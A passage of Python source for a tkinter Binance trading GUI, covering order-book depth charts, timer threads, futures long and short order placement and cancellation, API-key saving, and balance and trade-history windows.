str(float(BnFAcc1['positionAmt'])*float(BnFAcc1['entryPrice']))))
TP_SCh = False
#print(TP_It[0])
if TP_SCh == True and float(BnFAcc1['positionAmt']) != 0:
#print(TP_It)
#print(str(BnFAcc1['symbol']),str(BnFAcc1['unRealizedProfit']),str(BnFAcc1['positionSide']))
app.Tree_Pos.insert(parent='',index='end',iid=l,text='',values=(str(BnFAcc1['positionSide']),str(BnFAcc1['symbol']),str(BnFAcc1['leverage']),str(BnFAcc1['unRealizedProfit']),
str(BnFAcc1['entryPrice']),str(BnFAcc1['markPrice']),str(BnFAcc1['liquidationPrice']),
str(float(BnFAcc1['positionAmt'])*float(BnFAcc1['entryPrice']))))
l +=1
TP_CL=app.Tree_Pos.get_children()
TP_CC=len(TP_CL)
TP_Tpl_Tmp=[]
for nn in range(1,TP_CC+1):
TP_It = app.Tree_Pos.item(nn)["values"]
TP_Tpl_Tmp.append(app.Tree_Pos.item(nn)["values"])
#print(TP_Tpl_Tmp[nn-1])
#print(len(app.Tree_Pos.get_children()))
kk=0
nm=False
for nn in range(1,TP_CC+1):
TP_It = app.Tree_Pos.item(nn)["values"]
if float(TP_It[3]) == 0 and float(TP_It[4]) == 0 and kk<=len(TP_Tpl_Tmp):
nm=True
km=False
for mm in range(kk,len(TP_Tpl_Tmp)):
#print(mm)
if float(TP_Tpl_Tmp[mm][3])!=0 and float(TP_Tpl_Tmp[mm][4])!=0 and km==False:
app.Tree_Pos.item(nn, values=(TP_Tpl_Tmp[mm][0],TP_Tpl_Tmp[mm][1],TP_Tpl_Tmp[mm][2],TP_Tpl_Tmp[mm][3],TP_Tpl_Tmp[mm][4],TP_Tpl_Tmp[mm][5],TP_Tpl_Tmp[mm][6],TP_Tpl_Tmp[mm][7]))
kk=mm+1
#print(nn,kk,mm)
km=True
if nm==True and km==False:
kk=len(TP_Tpl_Tmp)+1
else:
#print(nn,kk)
if nm==True and kk<TP_CC:
app.Tree_Pos.item(nn, values=(TP_Tpl_Tmp[kk][0],TP_Tpl_Tmp[kk][1],TP_Tpl_Tmp[kk][2],TP_Tpl_Tmp[kk][3],TP_Tpl_Tmp[kk][4],TP_Tpl_Tmp[kk][5],TP_Tpl_Tmp[kk][6],TP_Tpl_Tmp[kk][7]))
kk +=1
if kk>len(TP_Tpl_Tmp) and nn<=TP_CC+1:
app.Tree_Pos.delete(nn)
TP_CL=app.Tree_Pos.get_children()
TP_CC=len(TP_CL)
for nn in range(1,TP_CC+1):
app.Tree_Pos.item(nn, tags=())
TP_Tpl_Tmp=app.Tree_Pos.item(nn)["values"]
if float(TP_Tpl_Tmp[3]) > 0:
app.Tree_Pos.item(nn,tags=('plus'))
elif float(TP_Tpl_Tmp[3]) <0:
app.Tree_Pos.item(nn,tags=('minus'))
app.Tree_Pos.tag_configure('plus', background='#d6f8d6')
app.Tree_Pos.tag_configure('minus', background='#fce7e7')
app.Tree_Pos.yview_moveto((TrSc_P[0]))
#print(TrSc_P[0])
if i == 0:
i = 1
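#______________Helper sketch: the trading-session labels in Timer_AccBlns
#The balance timer appends session names based on the local hour. The hour windows
#below copy the ones hard-coded above; they are the original author's local-time
#assumptions, not exchange data. A standalone version for illustration:
def active_sessions(hour):
    sessions = []
    if 11 <= hour <= 19:
        sessions.append('London')
    if 16 <= hour <= 23 or hour == 0:
        sessions.append('New York')
    if 0 <= hour <= 8:
        sessions.append('Sydney')
    if 2 <= hour <= 10:
        sessions.append('Tokyo')
    return sessions
#active_sessions(17) -> ['London', 'New York']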
#______________Timer of the orders chart (Orders book)
class Timer_OrdTmr:
def __init__(self):
global TE_OrdTmr
while True:
if PS_OT == False:
                sys_msg = ' Order book chart ' + grSmb + ' is stopped.'
app.Sys_Msg(text1=sys_msg)
TE_OrdTmr = True
break
if should_run_OT:
for i in range(400):
if not should_run_OT:
                        sys_msg = ' Order book chart ' + grSmb + ' will be stopped.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_OT:
if i==0:
                            sys_msg = ' Order book chart ' + grSmb + ' is running.'
app.Sys_Msg(text1=sys_msg)
TE_OrdTmr = False
if i > 0:
time.sleep(0.5)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=1000)) #tupl (IF LIMIT<=50 THEN WEIGHT = 2; LIMIT=100 WEIGHT = 5;LIMIT=500 WEIGHT = 10;LIMIT=1000 WEIGHT = 20)
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=1000)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
#Order Book Graph
app.graph_2.delete("all")
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
if (float(mylist5[m][1])*float(mylist5[m][0]))>50000:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="pink",width=(grSt/10))
for m in range (int(len(mylist4))):
if float(mylist4[m][1])>0:
if (float(mylist4[m][1])*float(mylist4[m][0]))>50000:
points=[]
x0 = 180
y0 = grMd - ((float(mylist4[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="lightgreen",width=(grSt/10))
#______________Timer of the Zoom orders book
class Timer_Zoom:
def __init__(self):
global ss
global yI
global Lo
global yI0Zm
global TE_Zm
while True:
if Ord_Zm == False:
                sys_msg = ' Order book zoom ' + grSmb + ' is stopped.'
app.Sys_Msg(text1=sys_msg)
TE_Zm = True
break
if should_run_OZ:
for i in range(400):
if not should_run_OZ:
                        sys_msg = ' Order book zoom ' + grSmb + ' will be stopped.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_OZ:
if i==0:
TE_Zm = False
                            sys_msg = ' Order book zoom ' + grSmb + ' is running.'
app.Sys_Msg(text1=sys_msg)
if i > 0:
time.sleep(0.01)
#print (grSmb)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=20)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=20)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
#print (mylist4)
if i==0:
yI0Zm=float(mylist4[19][0])
grMd = grH/2
grSt = grZm/(yI0Zm*0.01/prSt)
TT0 = time.mktime(time.localtime())*1000
grStZ=1000/40
#Order Book Graph
app.graph_Zm.delete("all")
yI0Zm=float(mylist4[0][0])
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-yI0Zm)/prSt)* grStZ
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/200))*10
y1 = grMd - ((float(mylist5[m][0])-yI0Zm)/prSt)* grStZ
pp=(x1,y1)
points.append(pp)
app.graph_Zm.create_line(points,fill="pink",width=grStZ)
if prSt >= 0.1:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist5[m][0]))
elif 0.1 > prSt >= 0.01:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist5[m][0]))
elif 0.01 > prSt >= 0.001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.3f" % float(mylist5[m][0]))
elif 0.001 > prSt >= 0.0001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.4f" % float(mylist5[m][0]))
elif prSt < 0.0001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.8f" % float(mylist5[m][0]))
if float(mylist4[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist4[m][0])-yI0Zm)/prSt)* grStZ
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/200))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-yI0Zm)/prSt)* grStZ
pp=(x1,y1)
points.append(pp)
app.graph_Zm.create_line(points,fill="lightgreen",width=grStZ)
if prSt >= 0.1:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist4[m][0]))
elif 0.1 > prSt >= 0.01:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist4[m][0]))
elif 0.01 > prSt >= 0.001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.3f" % float(mylist4[m][0]))
elif 0.001 > prSt >= 0.0001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.4f" % float(mylist4[m][0]))
elif prSt < 0.0001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.8f" % float(mylist4[m][0]))
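#______________Helper sketch: price formatting by tick size
#The prSt elif ladders above pick a "%.Nf" format per tick size. The same table as
#one function (a sketch; the ladders above stay authoritative for the widgets):
def fmt_price(price, prSt):
    if prSt >= 0.01:       #the ladders use "%.2f" for both >=0.1 and >=0.01
        return "%.2f" % float(price)
    elif prSt >= 0.001:
        return "%.3f" % float(price)
    elif prSt >= 0.0001:
        return "%.4f" % float(price)
    return "%.8f" % float(price)
#fmt_price(0.12345678, 0.00001) -> '0.12345678'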
#______________Timer that checks the daemon timer threads have stopped before terminating the program
class Timer_End:
def __init__(self):
while True:
if TE_Tck==True and TE_Cnd == True and TE_CndSm == True and TE_BU == True and TE_AB == True and TE_Zm == True and TE_OrdTmr == True:
root.destroy()
break
time.sleep(0.01)
#______________Shutting down the program (close window button)
def close_window():
global ep
global should_run_T
global should_run_C
global should_run_S
global should_run_BU
global should_run_AB
global should_run_OT
global should_run_OZ
global PS1
global PS_BU
global PS_AB
global PS_OT
global Ord_Zm
ep=messagebox.askokcancel(title=None, message='Do you really want to exit the program?')
if ep==True:
should_run_T=False
PS1 = True
should_run_C=False
should_run_S=False
should_run_BU=False
PS_BU = False
should_run_AB=False
PS_AB = False
should_run_OT=False
PS_OT = False
should_run_OZ=False
Ord_Zm = False
TEPr = threading.Thread(target=Timer_End,daemon=True)
TEPr.start()
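#______________Sketch: the shutdown handshake in one place
#close_window() flips the should_run_*/PS_* flags, each timer sets its TE_* flag on
#exit, and Timer_End polls those flags before calling root.destroy(). The same
#handshake expressed with threading.Event (a sketch, not wired into the GUI):
def _event_handshake_sketch():
    stop_requested = threading.Event()  #set by the close handler
    worker_done = threading.Event()     #set by the worker on exit

    def worker_loop():
        while not stop_requested.is_set():
            stop_requested.wait(0.5)    #...fetch, redraw, sleep...
        worker_done.set()

    return stop_requested, worker_done, worker_loop
#close handler: stop_requested.set(); worker_done.wait(); root.destroy()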
#______________BUTTON 1_CLICK BEGIN - Start/Stop TICK/CANDLE GRAPH
def click_button1():
global should_run_T
global should_run_C
global should_run_S
global myFont
global PS1
#print(GS)
myFont = font.Font(size=15)
app.button_1['font'] = myFont
if GS == 'TICK':
if should_run_T == True:
should_run_T = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Start", fg='green')
else:
PS1 = False
t1 = threading.Thread(target=Timer_Tick,daemon=True)
t1.start()
app.button_1.config(text="Stop", fg='red')
should_run_T = True
    elif GS in ('CANDLE 1m', 'CANDLE 5m', 'CANDLE 15m', 'CANDLE 30m', 'CANDLE 1h', 'CANDLE 4h', 'CANDLE 1d'):
if should_run_C == True:
should_run_C = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Start", fg='green')
else:
PS1 = False
t2 = threading.Thread(target=Timer_Candle,daemon=True)
t2.start()
app.button_1.config(text="Stop", fg='red')
should_run_C = True
elif GS == 'CANDLE SUMM':
if should_run_S == True:
should_run_S = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Start", fg='green')
else:
PS1 = False
timer_3_CSumm = threading.Thread(target=Timer_Candle_Summ,daemon=True)
timer_3_CSumm.start()
app.button_1.config(text="Stop", fg='red')
should_run_S = True
#______________BUTTON 1_CLICK END - Start/Stop TICK/CANDLE GRAPH
#______________BUTTON 2_CLICK BEGIN - Start/Stop BTC WATCHER
def click_button2():
global PS_BU
global should_run_BU
myFont = font.Font(size=10)
app.button_2['font'] = myFont
#print (PS_BU, should_run_BU)
if PS_BU == True and should_run_BU == True:
PS_BU = False
should_run_BU = False
app.button_2.config(text="Start", fg='green')
elif PS_BU == False and should_run_BU == False:
PS_BU = True
should_run_BU = True
timer_BU = threading.Thread(target=Timer_BTCUSDT,daemon=True)
timer_BU.start()
app.button_2.config(text="Stop", fg='red')
#______________BUTTON 2_CLICK END - Start/Stop BTC WATCHER
#______________BUTTON AB_CLICK BEGIN - Start/Stop ACCOUNT BALANCES WATCHER + FUTURES POSITIONS WATCHER
def click_buttonAB():
global PS_AB
global should_run_AB
myFont = font.Font(size=10)
app.button_AB['font'] = myFont
#print (PS_AB, should_run_AB)
if PS_AB == True and should_run_AB == True:
PS_AB = False
should_run_AB = False
app.button_AB.config(text="Start", fg='green')
elif PS_AB == False and should_run_AB == False:
PS_AB = True
should_run_AB = True
timer_AB = threading.Thread(target=Timer_AccBlns,daemon=True)
timer_AB.start()
app.button_AB.config(text="Stop", fg='red')
#______________BUTTON AB_CLICK END - Start/Stop ACCOUNT BALANCES WATCHER + FUTURES POSITIONS WATCHER
#______________BUTTON OrdTmr_CLICK BEGIN - Start/Stop DEPTH TIMER
def click_button_OrdTmr():
global PS_OT
global should_run_OT
myFont = font.Font(size=10)
app.button_OrdTmr['font'] = myFont
#print (PS_BU, should_run_BU)
if PS_OT == True and should_run_OT == True:
PS_OT = False
should_run_OT = False
app.button_OrdTmr.config(text="Orders start", fg='green')
elif PS_OT == False and should_run_OT == False:
PS_OT = True
should_run_OT = True
timer_OT = threading.Thread(target=Timer_OrdTmr,daemon=True)
timer_OT.start()
app.button_OrdTmr.config(text="Orders stop", fg='red')
#______________BUTTON OrdTmr_CLICK END - Start/Stop DEPTH TIMER
#______________BUTTON Zm_CLICK BEGIN - Start/Stop DEPTH ZOOM
def click_button_Zm():
global Ord_Zm
global should_run_OZ
wh = root.winfo_height()
ww = root.winfo_width()
if Ord_Zm == False:
should_run_OZ = True
Ord_Zm = True
app.graph_Zm.place(x=ww-420,y=150,width=200,height=wh-320)
app.graph_2.place_forget()
app.button_Ord.config(text="Stop Zoom")
timer_Zm = threading.Thread(target=Timer_Zoom,daemon=True)
timer_Zm.start()
else:
should_run_OZ = False
Ord_Zm = False
app.button_Ord.config(text="Start Zoom")
app.graph_2.place(x=ww-420,y=150,width=200,height=wh-320)
app.graph_Zm.place_forget()
#______________BUTTON Zm_CLICK END - Start/Stop DEPTH ZOOM
#______________BUTTON NwOL_CLICK BEGIN (New Order Long) - SET NEW LONG FUTURES ORDER
def click_buttonNwOL():
    #By default the futures account uses One-way position mode. Hedge Mode (dual-side
    #positions) is enabled via the endpoint POST /fapi/v1/positionSide/dual with the
    #parameter dualSidePosition=true.
    #Open position:  Long: positionSide=LONG, side=BUY   Short: positionSide=SHORT, side=SELL
    #Close position: Long: positionSide=LONG, side=SELL  Short: positionSide=SHORT, side=BUY
if MS == 'FUTURES':
k1_f = float(app.text_POrd.get(1.0,'end'))
k1_s = app.text_POrd.get(1.0,'end')
k2_f = float(app.text_QOrd.get(1.0,'end'))
k2_s = app.text_QOrd.get(1.0,'end')
k3_f=(k2_f*int(Lvrg))/k1_f
#print(k3_f,' ', orLSS)
if float(orLSS) >= 1:
k3_s = int(k3_f)
elif 1> float(orLSS) >= 0.1:
k3_s = "%.1f" % (k3_f)
elif 0.1 > float(orLSS) >= 0.01:
k3_s = "%.2f" % (k3_f)
elif 0.01 > float(orLSS) >= 0.001:
k3_s = "%.3f" % (k3_f)
elif 0.001 > float(orLSS) >= 0.0001:
k3_s = "%.4f" % (k3_f)
elif 0.00001 <= float(orLSS) < 0.0001:
k3_s = "%.5f" % (k3_f)
elif 0.000001 <= float(orLSS) < 0.00001:
k3_s = "%.6f" % (k3_f)
elif 0.0000001 <= float(orLSS) < 0.000001:
k3_s = "%.7f" % (k3_f)
elif float(orLSS) < 0.0000001:
k3_s = "%.8f" % (k3_f)
#print(k3_s)
if k1_f > 0 and k2_f > 0:
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='BUY', positionSide='LONG', type='LIMIT', timeInForce='GTC', quantity=k3_s, price=k1_f, newOrderRespType='FULL')
            sys_msg = ' Buy order ' + grSmb + ' in LONG at price ' + str(k1_f) + ' USDT for quantity ' + str(k3_s) + ' is set.'
sys_msg += ' Margin ' + str(k2_f) +' USDT, order sum ' + str(k3_f*k1_f) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
#______________BUTTON NwOL_CLICK END (New Order Long) - SET NEW LONG FUTURES ORDER
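#______________Helper sketch: quantity rounding by LOT_SIZE step
#Both order buttons round (margin * leverage)/price to the pair's lot step via the
#long elif ladders over orLSS. A decimal-based equivalent (a sketch; orLSS is the
#step-size value those ladders inspect):
from decimal import Decimal, ROUND_DOWN

def round_qty(qty, step):
    #Round down to a multiple of the step, which is what the exchange accepts:
    #round_qty(1.2377, '0.001') -> Decimal('1.237')
    step_d = Decimal(str(step))
    return (Decimal(str(qty)) / step_d).to_integral_value(rounding=ROUND_DOWN) * step_d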
#______________BUTTON NwOS_CLICK BEGIN (New Order Short) - SET NEW SHORT FUTURES ORDER
def click_buttonNwOS():
if MS == 'FUTURES':
k1_f = float(app.text_POrd.get(1.0,'end'))
k1_s = app.text_POrd.get(1.0,'end')
k2_f = float(app.text_QOrd.get(1.0,'end'))
k2_s = app.text_QOrd.get(1.0,'end')
k3_f=(k2_f*int(Lvrg))/k1_f
#print(k3_f)
if float(orLSS) >= 1:
k3_s = int(k3_f)
elif 1> float(orLSS) >= 0.1:
k3_s = "%.1f" % (k3_f)
elif 0.1 > float(orLSS) >= 0.01:
k3_s = "%.2f" % (k3_f)
elif 0.01 > float(orLSS) >= 0.001:
k3_s = "%.3f" % (k3_f)
elif 0.001 > float(orLSS) >= 0.0001:
k3_s = "%.4f" % (k3_f)
elif 0.00001 <= float(orLSS) < 0.0001:
k3_s = "%.5f" % (k3_f)
elif 0.000001 <= float(orLSS) < 0.00001:
k3_s = "%.6f" % (k3_f)
elif 0.0000001 <= float(orLSS) < 0.000001:
k3_s = "%.7f" % (k3_f)
elif float(orLSS) < 0.0000001:
k3_s = "%.8f" % (k3_f)
if k1_f > 0 and k2_f > 0:
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='SELL', positionSide='SHORT', type='LIMIT', timeInForce='GTC', quantity=k3_s, price=k1_f, newOrderRespType='FULL')
            sys_msg = ' Sell order ' + grSmb + ' in SHORT at price ' + str(k1_f) + ' USDT for quantity ' + str(k3_s) + ' is set.'
sys_msg += ' Margin ' + str(k2_f) +' USDT, order sum ' + str(k3_f*k1_f) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
#______________BUTTON NwOS_CLICK END (New Order Short) - SET NEW SHORT FUTURES ORDER
#______________BUTTON NwODel_CLICK BEGIN (New Order Delete) - DELETE NEW LONG/SHORT FUTURES ORDER
def click_buttonNwODel():
#print('delete order')
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders(symbol=grSmb)
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['type'])=='LIMIT' and str(BnFAcc1['positionSide'])=='LONG':
#print(BnFAcc1)
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position LONG LIMIT order deleted [' + grSmb + '], Price: ' + str(BnFAcc1['price']) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders(symbol=grSmb)
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['type'])=='LIMIT' and str(BnFAcc1['positionSide'])=='SHORT':
#print(BnFAcc1)
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position SHORT LIMIT order deleted [' + grSmb + '], Price: ' + str(BnFAcc1['price']) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
#______________BUTTON NwODel_CLICK END (New Order Delete) - DELETE NEW LONG/SHORT FUTURES ORDER
#______________BUTTON NwOShow_CLICK BEGIN (New Order Show) - SHOW/HIDE NEW FUTURES ORDER
def click_buttonNwOShow():
global NwOrSw
if should_run_C == True and MS == 'FUTURES' and NwOrSw==False:
if PosSide == 'LONG':
k1=float(app.text_POrd.get(1.0,'end'))
k2=float(app.text_QOrd.get(1.0,'end'))
k3=(k2*float(Lvrg_Tmp))/k1
yyC =float(k1)-((float(k1)*(float(k3)/(float(Lvrg_Tmp)+1)))/float(k3))
yyC1 = grMd - (((k1+(k1-yyC))-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_TP, 850,yyC1,880,yyC2)
#print(PosSide)
yyC1 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_SL, 850,yyC1,880,yyC2)
if PosSide == 'SHORT':
#print(PosSide)
k1=float(app.text_POrd.get(1.0,'end'))
k2=float(app.text_QOrd.get(1.0,'end'))
k3=(k2*float(Lvrg_Tmp))/k1
yyC =float(k1)+((float(k1)*(float(k3)/(float(Lvrg_Tmp)+1)))/float(k3))
yyC1 = grMd - (((k1+(k1-yyC))-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_TP, 850,yyC1,880,yyC2)
yyC1 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_SL, 850,yyC1,880,yyC2)
NwOrSw=True
#print(NwOrSw)
app.button_NwOSw.config(text="Hide", fg='red')
elif should_run_C == True and MS == 'FUTURES' and NwOrSw==True:
NwOrSw=False
app.button_NwOSw.config(text="Show", fg='black')
app.graph_Cn.coords(GOS_SL, 0,0,0,0)
app.graph_Cn.coords(GOS_TP, 0,0,0,0)
#______________BUTTON NwOShow_CLICK END (New Order Show) - SHOW/HIDE NEW FUTURES ORDER
#______________BUTTONS END
#______________MENU BEGIN
#______________MENU ACCOUNT_CLICK BEGIN - SHOW NEW WINDOW WITH BINANCE ACCOUNT KEYS
def clicked_Bnacc():
global rootAcc
global app_acc
rootAcc = Tk()
app_acc = AccWn(rootAcc)
rootAcc.title('Binance keys')
rootAcc.geometry('550x120+150+100')
rootAcc.resizable(width=False, height=False)
rootAcc.mainloop()
#______________MENU ACCOUNT_CLICK END - SHOW NEW WINDOW WITH BINANCE ACCOUNT KEYS
#______________MENU ACCOUNT BUTTON SAVE CLICK BEGIN - SAVE KEYS
def click_button_AccSave():
global bot
global API_KEY_s
global API_SECRET_s
API_KEY_s = app_acc.text_AK.get(1.0,'end').replace("\n", "")
API_SECRET_s = app_acc.text_AS.get(1.0,'end').replace("\n", "")
if API_KEY_s != '' and API_SECRET_s != '':
bot = Binance(API_KEY=API_KEY_s, API_SECRET=API_SECRET_s)
my_file_Account = open("iTrader.cfg", "w")
sTmp = bot.API_KEY
sTmp += '\n'
sTmp += str(bot.API_SECRET, 'utf-8')
my_file_Account.write(sTmp)
my_file_Account.close()
messagebox.showinfo("Set account KEYs", "Data saved successfully.")
rootAcc.destroy()
#______________MENU ACCOUNT BUTTON SAVE CLICK END - SAVE KEYS
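#______________Helper sketch: reading the keys back from iTrader.cfg
#click_button_AccSave() writes the API key on line 1 and the secret on line 2.
#A matching loader would look like this (a sketch; the two-line file layout is
#the only thing it assumes):
def load_account_keys(path="iTrader.cfg"):
    with open(path, "r") as fh:
        lines = fh.read().splitlines()
    if len(lines) >= 2:
        return lines[0].strip(), lines[1].strip()  #(API_KEY, API_SECRET)
    return '', ''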
#______________MENU BALANCES_CLICK BEGIN - SHOW NEW WINDOW WITH BALANCES
def clicked_blns():
rootBlns = Tk()
rootBlns.title('Binance balances')
rootBlns.geometry('800x850+150+100')
tab_control = ttk.Notebook(rootBlns)
tab1 = ttk.Frame(tab_control)
tab2 = ttk.Frame(tab_control)
tab3 = ttk.Frame(tab_control)
tab_control.add(tab1, text='SPOT')
lbl1 = Label(tab1, text='Tab 1',justify=LEFT)
lbl1.grid(column=0, row=0)
tab_control.add(tab2, text='FUTURES')
lbl2 = Label(tab2, text='Tab 2',justify=LEFT)
lbl2.grid(column=0, row=0)
tab_control.add(tab3, text='MARGIN')
tab_control.pack(expand=1, fill='both')
    #__Populate Tab 1 - SPOT WALLETS
BnAcc = bot.account()
BnAcc1 = BnAcc.get('makerCommission')
sTmp = '\n 1. (makerCommission):' + str(BnAcc1)
BnAcc2 = BnAcc['takerCommission']
sTmp += '\n 2. takerCommission:' + str(BnAcc2)
BnAcc3 = BnAcc['buyerCommission']
sTmp += '\n 3. buyerCommission:' + str(BnAcc3)
BnAcc4 = BnAcc['sellerCommission']
sTmp += '\n 4. sellerCommission:' + str(BnAcc4)
BnAcc5 = BnAcc['canTrade']
sTmp += '\n 5. canTrade:' + str(BnAcc5)
BnAcc6 = BnAcc['canWithdraw']
sTmp += '\n 6. canWithdraw:' + str(BnAcc6)
BnAcc7 = BnAcc['canDeposit']
sTmp += '\n 7. canDeposit:' + str(BnAcc7)
BnAcc8 = BnAcc['updateTime']
sTmp += '\n 8. updateTime:' + str(BnAcc8)
BnAcc9 = BnAcc['accountType']
sTmp += '\n 9. accountType:' + str(BnAcc9)
BnAcc10 = BnAcc['balances']
sTmp += '\n 10. balances_len:' + str(len(BnAcc10))
BnAcc101=BnAcc10[0]
for mm in range(len(BnAcc10)):
BnAcc101 = BnAcc10[mm]
if float(BnAcc101['free']) > 0 or float(BnAcc101['locked']) > 0:
sTmp += '\n balance: ' + str(BnAcc101['asset']) + ". Free: " + str(BnAcc101['free']) + ". Locked: " + str(BnAcc101['locked'])
BnAcc11 = BnAcc['permissions']
sTmp += "\n 11 permissions_len " + str(len(BnAcc11)) + 'permissions:'+ str(BnAcc11)
for mm in range(len(BnAcc11)):
if BnAcc11[mm] == 'SPOT':
sTmp += "\n 11 permissions_SPOT = TRUE (Спотовая торговля)"
if BnAcc11[mm] == 'LEVERAGED':
sTmp += "\n 11 permissions_LEVERAGED = TRUE (Маржинальная торговля?)"
lbl1.config(text = sTmp)
    #__Populate Tab 2 - FUTURES WALLETS
sTmp = ''
BnFAcc = bot.futuresBalance()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
sTmp += '\n balance: ' + str(BnFAcc1['asset']) + ". Total: " + str(BnFAcc1['balance']) + ". Available: " + str(BnFAcc1['withdrawAvailable'])
lbl2.config(text = sTmp)
rootBlns.mainloop()
#______________MENU BALANCES_CLICK END - SHOW NEW WINDOW WITH BALANCES
#______________MENU ORDERS_CLICK BEGIN - SHOW NEW WINDOW WITH ORDERS
def clicked_Ordrs():
rootBlns = Tk()
rootBlns.title('Binance orders')
rootBlns.geometry('800x850+150+100')
tab_control = ttk.Notebook(rootBlns)
tab1 = ttk.Frame(tab_control)
tab2 = ttk.Frame(tab_control)
tab3 = ttk.Frame(tab_control)
tab_control.add(tab1, text='SPOT trades')
lbl1 = Label(tab1, text='Tab 1',justify=LEFT)
lbl1.grid(column=0, row=0)
tab_control.add(tab2, text='SPOT orders')
lbl2 = Label(tab2, text='Tab 2',justify=LEFT)
lbl2.grid(column=0, row=0)
tab_control.add(tab3, text='FUTURES trades')
lbl3 = Label(tab3, text='Tab 3',justify=LEFT)
lbl3.grid(column=0, row=0)
tab_control.pack(expand=1, fill='both')
BnAcc = bot.account()
    #The method returns the authorized user's trade history for the specified pair.
    #Weight – 5.
    #Parameters:
    #Mandatory:
    #symbol – pair
    #timestamp – the current time (filled in automatically by the client code, no need to pass it)
    #Optional:
    #limit – number of trades returned (maximum 500, default 500)
    #fromId – the trade id to start output from. By default, the most recent trades are returned.
    #recvWindow – request validity window.
BnMt = bot.myTrades(symbol=grSmb)
#print (len(BnMt))
    sTmp = grSmb #header for the pair actually queried
if len(BnMt)>0:
for mm in range(len(BnMt)):
BnMtM = BnMt[mm]
sTmp += '\n 1. ' + str(datetime.datetime.fromtimestamp(BnMtM['time']/1000))
if BnMtM['isBuyer'] == True:
sTmp += ' Buy'
else:
sTmp += ' Sell'
sTmp += '\n' + 'Price:' + str(BnMtM['price']) + '. Qty:' + str(BnMtM['qty']) + '. Sum:' + str(BnMtM['quoteQty'])
sTmp += '\n Commission:' + str(BnMtM['commissionAsset']) + ": "+ str(BnMtM['commission'])
lbl1.config(text = sTmp)
time_local_int = int(time.mktime(time.localtime()))
